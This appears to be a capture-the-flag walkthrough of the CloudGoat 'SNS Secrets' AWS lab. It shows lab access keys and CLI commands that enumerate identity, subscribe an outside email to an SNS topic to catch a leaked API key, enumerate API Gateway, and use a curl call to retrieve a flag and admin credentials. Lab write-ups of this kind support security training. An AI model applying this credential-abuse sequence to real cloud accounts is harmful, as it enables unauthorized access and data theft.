SNS Secrets
sns_user_access_key_id = AKIAZI2LCSHNJOCUCLVC
sns_user_secret_access_key = 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
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/sns_secrets]
└─# aws sts get-caller-identity --profile pw
{
"UserId": "AIDAZI2LCSHNDOON5AYNB",
"Account": "637423227354",
"Arn": "arn:aws:iam::637423227354:user/cg-sns-user-cgidrsy0favpsp"
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/sns_secrets]
└─# aws sns list-topics --profile pw
{
"Topics": [
{
"TopicArn": "arn:aws:sns:us-east-1:637423227354:public-topic-cgidrsy0favpsp"
}
]
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/sns_secrets]
└─# aws sns subscribe \
--topic-arn arn:aws:sns:us-east-1:637423227354:public-topic-cgidrsy0favpsp \
--protocol email \
--notification-endpoint yarkhan025@gmail.com \
--profile pw
{
"SubscriptionArn": "pending confirmation"
}
confirmed through the mail (might be in spams)
received this mail after confirming
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/sns_secrets]
└─# aws apigateway get-rest-apis --profile pw
{
"items": [
{
"id": "3mr2ebz0ak",
"name": "cg-api-cgidrsy0favpsp",
"description": "API for demonstrating leaked API key scenario",
"createdDate": "2025-07-06T18:36:09+05:00",
"apiKeySource": "HEADER",
"endpointConfiguration": {
"types": [
"EDGE"
],
"ipAddressType": "ipv4"
},
"tags": {
"Scenario": "iam_privesc_by_key_rotation",
"Stack": "CloudGoat"
},
"disableExecuteApiEndpoint": false,
"rootResourceId": "rj90ky2wv8"
}
]
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/sns_secrets]
└─# aws apigateway get-stages \
--rest-api-id 3mr2ebz0ak \
--profile pw
{
"item": [
{
"deploymentId": "x3k470",
"stageName": "prod-cgidrsy0favpsp",
"cacheClusterEnabled": false,
"cacheClusterStatus": "NOT_AVAILABLE",
"methodSettings": {},
"tracingEnabled": false,
"tags": {
"Scenario": "iam_privesc_by_key_rotation",
"Stack": "CloudGoat"
},
"createdDate": "2025-07-06T18:36:13+05:00",
"lastUpdatedDate": "2025-07-06T18:36:13+05:00"
}
]
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/sns_secrets]
└─# aws apigateway get-usage-plans --profile pw
{
"items": [
{
"id": "0qtwst",
"name": "cg-usage-plan-cgidrsy0favpsp",
"apiStages": [
{
"apiId": "3mr2ebz0ak",
"stage": "prod-cgidrsy0favpsp"
}
],
"tags": {
"Scenario": "iam_privesc_by_key_rotation",
"Stack": "CloudGoat"
}
}
]
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/sns_secrets]
└─# aws apigateway get-resources \
--rest-api-id 3mr2ebz0ak \
--profile pw
{
"items": [
{
"id": "4br17j",
"parentId": "rj90ky2wv8",
"pathPart": "user-data",
"path": "/user-data",
"resourceMethods": {
"GET": {}
}
},
{
"id": "rj90ky2wv8",
"path": "/"
}
]
}
curl https://3mr2ebz0ak.execute-api.us-east-1.amazonaws.com/prod-cgidrsy0favpsp/user-data -H 'x-api-key: 45a3da610dc
64703b10e273a4db135bf' {"final_flag": "FLAG{SNS_S3r3ts_ar3_FUN}", "message" : "Access granted"
, "user_data" : {"email": "SuperAdmin@notarealemail.co
m", "password": "p@sswOrd123", "user_id": "1337", "username" : "SuperAdmin"}}
Top comments (0)